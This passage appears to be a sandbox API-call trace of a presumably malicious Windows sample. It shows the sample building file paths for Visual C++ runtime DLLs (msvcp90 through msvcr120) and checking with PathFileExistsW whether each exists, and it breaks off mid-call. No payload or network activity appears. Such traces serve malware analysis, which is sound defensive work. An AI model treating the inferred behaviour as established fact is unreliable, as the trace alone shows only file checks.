[0204.835] lstrcpyW (in: lpString1=0x2e20000, lpString2="msvcr" | out: lpString1="msvcr") returned="msvcr" [0204.835] lstrlenW (lpString="msvcr") returned 5 [0204.835] lstrlenW (lpString="\\") returned 1 [0204.835] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.835] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3110000 [0204.836] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.836] lstrcatW (in: lpString1="\\", lpString2="msvcr" | out: lpString1="\\msvcr") returned="\\msvcr" [0204.836] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.837] lstrlenW (lpString="\\msvcp") returned 6 [0204.837] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.837] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcp" | out: lpString1="\\msvcp") returned="\\msvcp" [0204.837] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="90") returned 2 [0204.837] lstrlenW (lpString="90") returned 2 [0204.837] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.837] lstrlenW (lpString="90") returned 2 [0204.837] lstrcpyW (in: lpString1=0x2e20000, lpString2="90" | out: lpString1="90") returned="90" [0204.838] lstrlenW (lpString="90") returned 2 [0204.838] lstrlenW (lpString="\\msvcp") returned 6 [0204.838] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.838] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.838] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.838] lstrcatW (in: lpString1="\\msvcp", lpString2="90" | out: lpString1="\\msvcp90") returned="\\msvcp90" [0204.838] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.839] lstrlenW (lpString=".dll") returned 4 [0204.839] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.839] lstrlenW (lpString=".dll") returned 4 [0204.839] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.839] lstrlenW (lpString=".dll") returned 4 [0204.839] lstrlenW (lpString="\\msvcp90") returned 8 [0204.839] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.839] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.840] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.840] lstrcatW (in: lpString1="\\msvcp90", lpString2=".dll" | out: lpString1="\\msvcp90.dll") returned="\\msvcp90.dll" [0204.840] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.840] PathFileExistsW (pszPath="\\msvcp90.dll") returned 0 [0204.841] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.841] lstrlenW (lpString="\\msvcp") returned 6 [0204.841] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.841] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcp" | out: lpString1="\\msvcp") returned="\\msvcp" [0204.841] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="100") returned 3 [0204.842] lstrlenW (lpString="100") returned 3 [0204.842] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.842] lstrlenW (lpString="100") returned 3 [0204.842] lstrcpyW (in: lpString1=0x2e20000, lpString2="100" | out: lpString1="100") returned="100" [0204.842] lstrlenW (lpString="100") returned 3 [0204.842] lstrlenW (lpString="\\msvcp") returned 6 [0204.842] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.842] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.842] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.843] lstrcatW (in: lpString1="\\msvcp", lpString2="100" | out: lpString1="\\msvcp100") returned="\\msvcp100" [0204.843] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.843] lstrlenW (lpString=".dll") returned 4 [0204.843] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.844] lstrlenW (lpString=".dll") returned 4 [0204.844] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.844] lstrlenW (lpString=".dll") returned 4 [0204.844] lstrlenW (lpString="\\msvcp100") returned 9 [0204.844] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.844] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.845] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.845] lstrcatW (in: lpString1="\\msvcp100", lpString2=".dll" | out: lpString1="\\msvcp100.dll") returned="\\msvcp100.dll" [0204.845] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.845] PathFileExistsW (pszPath="\\msvcp100.dll") returned 0 [0204.846] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.846] lstrlenW (lpString="\\msvcp") returned 6 [0204.846] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.846] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcp" | out: lpString1="\\msvcp") returned="\\msvcp" [0204.846] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="110") returned 3 [0204.846] lstrlenW (lpString="110") returned 3 [0204.846] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.847] lstrlenW (lpString="110") returned 3 [0204.847] lstrcpyW (in: lpString1=0x2e20000, lpString2="110" | out: lpString1="110") returned="110" [0204.847] lstrlenW (lpString="110") returned 3 [0204.847] lstrlenW (lpString="\\msvcp") returned 6 [0204.847] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.847] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.847] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.848] lstrcatW (in: lpString1="\\msvcp", lpString2="110" | out: lpString1="\\msvcp110") returned="\\msvcp110" [0204.848] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.848] lstrlenW (lpString=".dll") returned 4 [0204.848] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.848] lstrlenW (lpString=".dll") returned 4 [0204.849] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.849] lstrlenW (lpString=".dll") returned 4 [0204.849] lstrlenW (lpString="\\msvcp110") returned 9 [0204.849] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.849] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.849] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.849] lstrcatW (in: lpString1="\\msvcp110", lpString2=".dll" | out: lpString1="\\msvcp110.dll") returned="\\msvcp110.dll" [0204.849] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.850] PathFileExistsW (pszPath="\\msvcp110.dll") returned 0 [0204.850] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.850] lstrlenW (lpString="\\msvcp") returned 6 [0204.850] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.851] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcp" | out: lpString1="\\msvcp") returned="\\msvcp" [0204.851] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="120") returned 3 [0204.851] lstrlenW (lpString="120") returned 3 [0204.851] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.851] lstrlenW (lpString="120") returned 3 [0204.851] lstrcpyW (in: lpString1=0x2e20000, lpString2="120" | out: lpString1="120") returned="120" [0204.851] lstrlenW (lpString="120") returned 3 [0204.851] lstrlenW (lpString="\\msvcp") returned 6 [0204.851] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.851] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.852] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.852] lstrcatW (in: lpString1="\\msvcp", lpString2="120" | out: lpString1="\\msvcp120") returned="\\msvcp120" [0204.852] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.853] lstrlenW (lpString=".dll") returned 4 [0204.853] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.853] lstrlenW (lpString=".dll") returned 4 [0204.853] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.853] lstrlenW (lpString=".dll") returned 4 [0204.853] lstrlenW (lpString="\\msvcp120") returned 9 [0204.853] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.853] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.854] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.854] lstrcatW (in: lpString1="\\msvcp120", lpString2=".dll" | out: lpString1="\\msvcp120.dll") returned="\\msvcp120.dll" [0204.854] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.854] PathFileExistsW (pszPath="\\msvcp120.dll") returned 0 [0204.854] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.855] lstrlenW (lpString="\\msvcp") returned 6 [0204.855] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.855] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcp" | out: lpString1="\\msvcp") returned="\\msvcp" [0204.855] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="130") returned 3 [0204.855] lstrlenW (lpString="130") returned 3 [0204.855] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.856] lstrlenW (lpString="130") returned 3 [0204.856] lstrcpyW (in: lpString1=0x2e20000, lpString2="130" | out: lpString1="130") returned="130" [0204.856] lstrlenW (lpString="130") returned 3 [0204.856] lstrlenW (lpString="\\msvcp") returned 6 [0204.856] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.856] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.856] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.857] lstrcatW (in: lpString1="\\msvcp", lpString2="130" | out: lpString1="\\msvcp130") returned="\\msvcp130" [0204.857] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.857] lstrlenW (lpString=".dll") returned 4 [0204.857] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.857] lstrlenW (lpString=".dll") returned 4 [0204.858] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.858] lstrlenW (lpString=".dll") returned 4 [0204.858] lstrlenW (lpString="\\msvcp130") returned 9 [0204.858] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.858] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.858] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.858] lstrcatW (in: lpString1="\\msvcp130", lpString2=".dll" | out: lpString1="\\msvcp130.dll") returned="\\msvcp130.dll" [0204.858] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.859] PathFileExistsW (pszPath="\\msvcp130.dll") returned 0 [0204.859] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.859] lstrlenW (lpString="\\msvcp") returned 6 [0204.859] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.860] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcp" | out: lpString1="\\msvcp") returned="\\msvcp" [0204.860] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="140") returned 3 [0204.860] lstrlenW (lpString="140") returned 3 [0204.860] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.860] lstrlenW (lpString="140") returned 3 [0204.860] lstrcpyW (in: lpString1=0x2e20000, lpString2="140" | out: lpString1="140") returned="140" [0204.860] lstrlenW (lpString="140") returned 3 [0204.860] lstrlenW (lpString="\\msvcp") returned 6 [0204.860] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.860] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.861] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.861] lstrcatW (in: lpString1="\\msvcp", lpString2="140" | out: lpString1="\\msvcp140") returned="\\msvcp140" [0204.861] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.862] lstrlenW (lpString=".dll") returned 4 [0204.862] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.862] lstrlenW (lpString=".dll") returned 4 [0204.862] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.862] lstrlenW (lpString=".dll") returned 4 [0204.862] lstrlenW (lpString="\\msvcp140") returned 9 [0204.862] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.862] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.862] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.863] lstrcatW (in: lpString1="\\msvcp140", lpString2=".dll" | out: lpString1="\\msvcp140.dll") returned="\\msvcp140.dll" [0204.863] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.863] PathFileExistsW (pszPath="\\msvcp140.dll") returned 0 [0204.863] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.864] lstrlenW (lpString="\\msvcr") returned 6 [0204.864] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.864] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcr" | out: lpString1="\\msvcr") returned="\\msvcr" [0204.864] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="90") returned 2 [0204.864] lstrlenW (lpString="90") returned 2 [0204.864] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.865] lstrlenW (lpString="90") returned 2 [0204.865] lstrcpyW (in: lpString1=0x2e20000, lpString2="90" | out: lpString1="90") returned="90" [0204.865] lstrlenW (lpString="90") returned 2 [0204.865] lstrlenW (lpString="\\msvcr") returned 6 [0204.865] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.865] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.865] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.866] lstrcatW (in: lpString1="\\msvcr", lpString2="90" | out: lpString1="\\msvcr90") returned="\\msvcr90" [0204.866] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.866] lstrlenW (lpString=".dll") returned 4 [0204.866] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.866] lstrlenW (lpString=".dll") returned 4 [0204.866] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.867] lstrlenW (lpString=".dll") returned 4 [0204.867] lstrlenW (lpString="\\msvcr90") returned 8 [0204.867] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.867] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.867] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.867] lstrcatW (in: lpString1="\\msvcr90", lpString2=".dll" | out: lpString1="\\msvcr90.dll") returned="\\msvcr90.dll" [0204.867] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.868] PathFileExistsW (pszPath="\\msvcr90.dll") returned 0 [0204.868] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.868] lstrlenW (lpString="\\msvcr") returned 6 [0204.868] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.869] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcr" | out: lpString1="\\msvcr") returned="\\msvcr" [0204.869] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="100") returned 3 [0204.869] lstrlenW (lpString="100") returned 3 [0204.869] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.869] lstrlenW (lpString="100") returned 3 [0204.869] lstrcpyW (in: lpString1=0x2e20000, lpString2="100" | out: lpString1="100") returned="100" [0204.869] lstrlenW (lpString="100") returned 3 [0204.869] lstrlenW (lpString="\\msvcr") returned 6 [0204.869] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.869] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.870] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.870] lstrcatW (in: lpString1="\\msvcr", lpString2="100" | out: lpString1="\\msvcr100") returned="\\msvcr100" [0204.870] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.871] lstrlenW (lpString=".dll") returned 4 [0204.871] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.871] lstrlenW (lpString=".dll") returned 4 [0204.871] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.871] lstrlenW (lpString=".dll") returned 4 [0204.871] lstrlenW (lpString="\\msvcr100") returned 9 [0204.871] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.871] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.871] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.872] lstrcatW (in: lpString1="\\msvcr100", lpString2=".dll" | out: lpString1="\\msvcr100.dll") returned="\\msvcr100.dll" [0204.872] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.872] PathFileExistsW (pszPath="\\msvcr100.dll") returned 0 [0204.872] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.873] lstrlenW (lpString="\\msvcr") returned 6 [0204.873] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.873] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcr" | out: lpString1="\\msvcr") returned="\\msvcr" [0204.873] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="110") returned 3 [0204.873] lstrlenW (lpString="110") returned 3 [0204.873] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.874] lstrlenW (lpString="110") returned 3 [0204.874] lstrcpyW (in: lpString1=0x2e20000, lpString2="110" | out: lpString1="110") returned="110" [0204.874] lstrlenW (lpString="110") returned 3 [0204.874] lstrlenW (lpString="\\msvcr") returned 6 [0204.874] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.874] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.874] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.874] lstrcatW (in: lpString1="\\msvcr", lpString2="110" | out: lpString1="\\msvcr110") returned="\\msvcr110" [0204.874] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.875] lstrlenW (lpString=".dll") returned 4 [0204.875] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.875] lstrlenW (lpString=".dll") returned 4 [0204.875] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.875] lstrlenW (lpString=".dll") returned 4 [0204.875] lstrlenW (lpString="\\msvcr110") returned 9 [0204.875] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.875] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.875] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.876] lstrcatW (in: lpString1="\\msvcr110", lpString2=".dll" | out: lpString1="\\msvcr110.dll") returned="\\msvcr110.dll" [0204.876] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.876] PathFileExistsW (pszPath="\\msvcr110.dll") returned 0 [0204.876] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.877] lstrlenW (lpString="\\msvcr") returned 6 [0204.877] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.877] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcr" | out: lpString1="\\msvcr") returned="\\msvcr" [0204.877] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="120") returned 3 [0204.877] lstrlenW (lpString="120") returned 3 [0204.877] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.877] lstrlenW (lpString="120") returned 3 [0204.877] lstrcpyW (in: lpString1=0x2e20000, lpString2="120" | out: lpString1="120") returned="120" [0204.877] lstrlenW (lpString="120") returned 3 [0204.877] lstrlenW (lpString="\\msvcr") returned 6 [0204.877] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.877] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.878] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.878] lstrcatW (in: lpString1="\\msvcr", lpString2="120" | out: lpString1="\\msvcr120") returned="\\msvcr120" [0204.878] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.879] lstrlenW (lpString=".dll") returned 4 [0204.879] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.879] lstrlenW (lpString=".dll") returned 4 [0204.879] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: 